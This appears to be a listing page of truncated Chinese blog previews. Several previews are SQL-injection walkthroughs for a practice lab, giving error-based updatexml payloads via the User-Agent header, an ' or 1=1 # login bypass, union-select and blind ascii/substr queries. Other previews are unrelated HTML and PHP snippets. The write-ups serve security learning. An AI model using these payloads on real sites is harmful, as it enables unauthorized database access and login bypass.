登陆框写入zkz 登陆  然后他给我返回了user agnet信息然后使用hackbar 修改user agnet参数1' or updatexml(1,concat(0x7e,(select database())),1),'','')# 页面回显出数据库名为security。然后我们查表名1' or updatexml(1,c

尝试在登录框输入万能密码     ‘ or 1=1 # 成功登录' or 1=1 order by 3 # 查字段 查到有两个字段 使用联合查询 ' or 1=2 union select 1,2  有回显 然后我们查询数据库名称    ' or 1=2 union sele

首先日常?id=1 and=1’ %23 发现正常显示   接着?id=1’ and 1=2%23报错 说明此处存在注入点 查数据库长度：and (length(database()))=8%23 正常显示 说明这个数据库名称长度是8. 然后我们用ASCII码猜数据库名称：and (ascii(substr(database(),1,1)

第一题：常规操作 ?id=1 and 1=1 没有报错 ?id=1 and 1=2 也没有报错 通过查看语句发现单引号没有闭合 所以我们使用?id=1’ %23 来闭合 我们使用?id=1’ and 1=1 order by 1 %23 语句成功执行但是到 order by 4 的时候报错 所以我们判断出有3个字段 查数据库名 ?id=1’ and

<!DOCTYPE html><html><head>    <meta charset="UTF-8">    <title>Document</title></head><body>    

<!DOCTYPE html><html><head>    <meta charset="UTF-8">    <title>Document</title></head><body>    

<?php $a = 0;for ($i=0; $i <=10000 ; $i++) {     if ($i % 3 ==0 && $i % 7 == 0) {        $a +=$i;    }    }echo

<!DOCTYPE html><html><head>    <meta charset="utf-8">    <title></title></head><body background="http://qzones

<!DOCTYPE html><html><head>    <meta charset="utf-8">    <title>简介</title></head><body>    <h1

<!DOCTYPE html><html><head>    <meta charset="utf-8">    <title></title></head><body background="http://qzones